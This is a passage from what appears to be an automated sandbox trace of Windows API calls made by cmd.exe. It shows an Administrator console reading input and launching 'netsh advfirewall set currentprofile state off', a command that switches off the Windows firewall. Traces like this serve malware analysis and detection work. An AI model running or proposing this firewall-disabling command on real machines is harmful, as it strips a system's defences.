0x98 [0046.736] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.736] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.737] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce35c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0046.737] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.737] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.737] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.737] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce35e, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0046.737] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.737] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.737] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.737] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce360, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0046.737] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.737] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.737] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.737] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce362, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0046.737] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.737] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.737] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.737] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce364, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0046.737] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.737] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.737] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.737] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce366, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0046.737] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.737] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.737] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.737] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce368, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0046.737] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.737] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.737] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.737] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce36a, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0046.737] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.737] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.737] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.737] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce36c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0046.738] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.738] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.738] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.738] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce36e, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0046.738] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.738] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.738] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.738] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce370, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0046.738] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.738] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.738] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.738] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce372, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0046.738] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.738] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.738] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.738] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce374, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0046.738] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.738] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.738] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.738] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce376, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0046.738] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.738] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.738] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.738] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce378, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0046.738] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.738] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.738] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.738] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce37a, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0046.738] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.738] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.738] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.738] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce37c, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0046.739] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.739] GetFileType (hFile=0x98) returned 0x3 [0046.739] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.739] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.739] _get_osfhandle (_FileHandle=1) returned 0xfc [0046.739] GetFileType (hFile=0xfc) returned 0x3 [0046.739] _get_osfhandle (_FileHandle=1) returned 0xfc [0046.739] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="netsh advfirewall set currentprofile state off\n", cchWideChar=-1, lpMultiByteStr=0x4a4cc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netsh advfirewall set currentprofile state off\n", lpUsedDefaultChar=0x0) returned 48 [0046.740] WriteFile (in: hFile=0xfc, lpBuffer=0x4a4cc320*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x2cfa38, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesWritten=0x2cfa38*=0x2f, lpOverlapped=0x0) returned 1 [0046.740] GetProcessHeap () returned 0x470000 [0046.740] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4012) returned 0x48cd20 [0046.740] GetProcessHeap () returned 0x470000 [0046.740] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48cd20 | out: hHeap=0x470000) returned 1 [0046.740] _wcsicmp (_String1="netsh", _String2=")") returned 69 [0046.740] _wcsicmp (_String1="FOR", _String2="netsh") returned -8 [0046.740] _wcsicmp (_String1="FOR/?", _String2="netsh") returned -8 [0046.740] _wcsicmp (_String1="IF", _String2="netsh") returned -5 [0046.740] _wcsicmp (_String1="IF/?", _String2="netsh") returned -5 [0046.740] _wcsicmp (_String1="REM", _String2="netsh") returned 4 [0046.740] _wcsicmp (_String1="REM/?", _String2="netsh") returned 4 [0046.740] GetProcessHeap () returned 0x470000 [0046.740] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb0) returned 0x4897e0 [0046.740] GetProcessHeap () returned 0x470000 [0046.740] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1c) returned 0x484610 [0046.741] GetProcessHeap () returned 0x470000 [0046.741] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x64) returned 0x4898a0 [0046.741] GetConsoleOutputCP () returned 0x1b5 [0046.742] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4cbfe0 | out: lpCPInfo=0x4a4cbfe0) returned 1 [0046.742] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0046.742] GetConsoleTitleW (in: lpConsoleTitle=0x2cf9f0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0046.742] _wcsicmp (_String1="netsh", _String2="DIR") returned 10 [0046.742] _wcsicmp (_String1="netsh", _String2="ERASE") returned 9 [0046.742] _wcsicmp (_String1="netsh", _String2="DEL") returned 10 [0046.742] _wcsicmp (_String1="netsh", _String2="TYPE") returned -6 [0046.742] _wcsicmp (_String1="netsh", _String2="COPY") returned 11 [0046.742] _wcsicmp (_String1="netsh", _String2="CD") returned 11 [0046.742] _wcsicmp (_String1="netsh", _String2="CHDIR") returned 11 [0046.742] _wcsicmp (_String1="netsh", _String2="RENAME") returned -4 [0046.742] _wcsicmp (_String1="netsh", _String2="REN") returned -4 [0046.742] _wcsicmp (_String1="netsh", _String2="ECHO") returned 9 [0046.742] _wcsicmp (_String1="netsh", _String2="SET") returned -5 [0046.742] _wcsicmp (_String1="netsh", _String2="PAUSE") returned -2 [0046.742] _wcsicmp (_String1="netsh", _String2="DATE") returned 10 [0046.742] _wcsicmp (_String1="netsh", _String2="TIME") returned -6 [0046.742] _wcsicmp (_String1="netsh", _String2="PROMPT") returned -2 [0046.742] _wcsicmp (_String1="netsh", _String2="MD") returned 1 [0046.742] _wcsicmp (_String1="netsh", _String2="MKDIR") returned 1 [0046.742] _wcsicmp (_String1="netsh", _String2="RD") returned -4 [0046.742] _wcsicmp (_String1="netsh", _String2="RMDIR") returned -4 [0046.742] _wcsicmp (_String1="netsh", _String2="PATH") returned -2 [0046.742] _wcsicmp (_String1="netsh", _String2="GOTO") returned 7 [0046.742] _wcsicmp (_String1="netsh", _String2="SHIFT") returned -5 [0046.743] _wcsicmp (_String1="netsh", _String2="CLS") returned 11 [0046.743] _wcsicmp (_String1="netsh", _String2="CALL") returned 11 [0046.743] _wcsicmp (_String1="netsh", _String2="VERIFY") returned -8 [0046.743] _wcsicmp (_String1="netsh", _String2="VER") returned -8 [0046.743] _wcsicmp (_String1="netsh", _String2="VOL") returned -8 [0046.743] _wcsicmp (_String1="netsh", _String2="EXIT") returned 9 [0046.743] _wcsicmp (_String1="netsh", _String2="SETLOCAL") returned -5 [0046.743] _wcsicmp (_String1="netsh", _String2="ENDLOCAL") returned 9 [0046.743] _wcsicmp (_String1="netsh", _String2="TITLE") returned -6 [0046.743] _wcsicmp (_String1="netsh", _String2="START") returned -5 [0046.743] _wcsicmp (_String1="netsh", _String2="DPATH") returned 10 [0046.743] _wcsicmp (_String1="netsh", _String2="KEYS") returned 3 [0046.743] _wcsicmp (_String1="netsh", _String2="MOVE") returned 1 [0046.743] _wcsicmp (_String1="netsh", _String2="PUSHD") returned -2 [0046.743] _wcsicmp (_String1="netsh", _String2="POPD") returned -2 [0046.743] _wcsicmp (_String1="netsh", _String2="ASSOC") returned 13 [0046.743] _wcsicmp (_String1="netsh", _String2="FTYPE") returned 8 [0046.743] _wcsicmp (_String1="netsh", _String2="BREAK") returned 12 [0046.743] _wcsicmp (_String1="netsh", _String2="COLOR") returned 11 [0046.743] _wcsicmp (_String1="netsh", _String2="MKLINK") returned 1 [0046.743] _wcsicmp (_String1="netsh", _String2="DIR") returned 10 [0046.743] _wcsicmp (_String1="netsh", _String2="ERASE") returned 9 [0046.743] _wcsicmp (_String1="netsh", _String2="DEL") returned 10 [0046.743] _wcsicmp (_String1="netsh", _String2="TYPE") returned -6 [0046.743] _wcsicmp (_String1="netsh", _String2="COPY") returned 11 [0046.743] _wcsicmp (_String1="netsh", _String2="CD") returned 11 [0046.743] _wcsicmp (_String1="netsh", _String2="CHDIR") returned 11 [0046.743] _wcsicmp (_String1="netsh", _String2="RENAME") returned -4 [0046.743] _wcsicmp (_String1="netsh", _String2="REN") returned -4 [0046.743] _wcsicmp (_String1="netsh", _String2="ECHO") returned 9 [0046.743] _wcsicmp (_String1="netsh", _String2="SET") returned -5 [0046.743] _wcsicmp (_String1="netsh", _String2="PAUSE") returned -2 [0046.743] _wcsicmp (_String1="netsh", _String2="DATE") returned 10 [0046.743] _wcsicmp (_String1="netsh", _String2="TIME") returned -6 [0046.743] _wcsicmp (_String1="netsh", _String2="PROMPT") returned -2 [0046.743] _wcsicmp (_String1="netsh", _String2="MD") returned 1 [0046.743] _wcsicmp (_String1="netsh", _String2="MKDIR") returned 1 [0046.743] _wcsicmp (_String1="netsh", _String2="RD") returned -4 [0046.743] _wcsicmp (_String1="netsh", _String2="RMDIR") returned -4 [0046.743] _wcsicmp (_String1="netsh", _String2="PATH") returned -2 [0046.743] _wcsicmp (_String1="netsh", _String2="GOTO") returned 7 [0046.743] _wcsicmp (_String1="netsh", _String2="SHIFT") returned -5 [0046.744] _wcsicmp (_String1="netsh", _String2="CLS") returned 11 [0046.744] _wcsicmp (_String1="netsh", _String2="CALL") returned 11 [0046.744] _wcsicmp (_String1="netsh", _String2="VERIFY") returned -8 [0046.744] _wcsicmp (_String1="netsh", _String2="VER") returned -8 [0046.744] _wcsicmp (_String1="netsh", _String2="VOL") returned -8 [0046.744] _wcsicmp (_String1="netsh", _String2="EXIT") returned 9 [0046.744] _wcsicmp (_String1="netsh", _String2="SETLOCAL") returned -5 [0046.744] _wcsicmp (_String1="netsh", _String2="ENDLOCAL") returned 9 [0046.744] _wcsicmp (_String1="netsh", _String2="TITLE") returned -6 [0046.744] _wcsicmp (_String1="netsh", _String2="START") returned -5 [0046.744] _wcsicmp (_String1="netsh", _String2="DPATH") returned 10 [0046.744] _wcsicmp (_String1="netsh", _String2="KEYS") returned 3 [0046.744] _wcsicmp (_String1="netsh", _String2="MOVE") returned 1 [0046.744] _wcsicmp (_String1="netsh", _String2="PUSHD") returned -2 [0046.744] _wcsicmp (_String1="netsh", _String2="POPD") returned -2 [0046.744] _wcsicmp (_String1="netsh", _String2="ASSOC") returned 13 [0046.744] _wcsicmp (_String1="netsh", _String2="FTYPE") returned 8 [0046.744] _wcsicmp (_String1="netsh", _String2="BREAK") returned 12 [0046.744] _wcsicmp (_String1="netsh", _String2="COLOR") returned 11 [0046.744] _wcsicmp (_String1="netsh", _String2="MKLINK") returned 1 [0046.744] _wcsicmp (_String1="netsh", _String2="FOR") returned 8 [0046.744] _wcsicmp (_String1="netsh", _String2="IF") returned 5 [0046.744] _wcsicmp (_String1="netsh", _String2="REM") returned -4 [0046.744] GetProcessHeap () returned 0x470000 [0046.744] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x218) returned 0x471ab0 [0046.744] GetProcessHeap () returned 0x470000 [0046.744] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x70) returned 0x471cd0 [0046.744] _wcsnicmp (_String1="nets", _String2="cmd ", _MaxCount=0x4) returned 11 [0046.744] GetProcessHeap () returned 0x470000 [0046.745] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x420) returned 0x489a80 [0046.745] SetErrorMode (uMode=0x0) returned 0x0 [0046.745] SetErrorMode (uMode=0x1) returned 0x0 [0046.745] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x489a90, lpFilePart=0x2cf280 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cf280*="Desktop") returned 0x25 [0046.745] SetErrorMode (uMode=0x0) returned 0x1 [0046.745] GetProcessHeap () returned 0x470000 [0046.745] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x489a80, Size=0x68) returned 0x489a80 [0046.745] GetProcessHeap () returned 0x470000 [0046.745] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x489a80) returned 0x68 [0046.745] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0046.745] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0046.745] GetProcessHeap () returned 0x470000 [0046.745] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x128) returned 0x485b70 [0046.745] GetProcessHeap () returned 0x470000 [0046.745] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x240) returned 0x489b00 [0046.750] GetProcessHeap () returned 0x470000 [0046.750] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x489b00, Size=0x12a) returned 0x489b00 [0046.750] GetProcessHeap () returned 0x470000 [0046.750] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x489b00) returned 0x12a [0046.750] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.750] GetProcessHeap () returned 0x470000 [0046.750] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe8) returned 0x489c40 [0046.750] GetProcessHeap () returned 0x470000 [0046.750] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x489c40, Size=0x7e) returned 0x489c40 [0046.750] GetProcessHeap () returned 0x470000 [0046.750] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x489c40) returned 0x7e [0046.751] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.751] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0x2ceff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceff0) returned 0xffffffffffffffff [0046.751] GetLastError () returned 0x2 [0046.751] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\netsh", fInfoLevelId=0x1, lpFindFileData=0x2ceff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceff0) returned 0xffffffffffffffff [0046.751] GetLastError () returned 0x2 [0046.751] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.751] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0x2ceff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceff0) returned 0x471d50 [0046.751] GetProcessHeap () returned 0x470000 [0046.751] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x28) returned 0x484640 [0046.751] FindClose (in: hFindFile=0x471d50 | out: hFindFile=0x471d50) returned 1 [0046.751] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.COM", fInfoLevelId=0x1, lpFindFileData=0x2ceff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceff0) returned 0xffffffffffffffff [0046.751] GetLastError () returned 0x2 [0046.751] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ceff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceff0) returned 0x471d50 [0046.751] GetProcessHeap () returned 0x470000 [0046.751] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x484640, Size=0x8) returned 0x488900 [0046.752] FindClose (in: hFindFile=0x471d50 | out: hFindFile=0x471d50) returned 1 [0046.752] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0046.752] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0046.752] GetConsoleTitleW (in: lpConsoleTitle=0x2cf540, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0046.752] GetProcessHeap () returned 0x470000 [0046.752] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x21c) returned 0x489cd0 [0046.752] GetConsoleTitleW (in: lpConsoleTitle=0x489ce0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0046.752] GetProcessHeap () returned 0x470000 [0046.752] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x489cd0, Size=0xd6) returned 0x489cd0 [0046.752] GetProcessHeap () returned 0x470000 [0046.752] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x489cd0) returned 0xd6 [0046.752] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - netsh advfirewall set currentprofile state off") returned 1 [0046.752] GetProcessHeap () returned 0x470000 [0046.752] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489cd0 | out: hHeap=0x470000) returned 1 [0046.753] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf2f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf2b8 | out: lpAttributeList=0x2cf2f8, lpSize=0x2cf2b8) returned 1 [0046.753] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf2f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf2a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf2f8, lpPreviousValue=0x0) returned 1 [0046.753] GetStartupInfoW (in: lpStartupInfo=0x2cf410 | out: lpStartupInfo=0x2cf410*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, 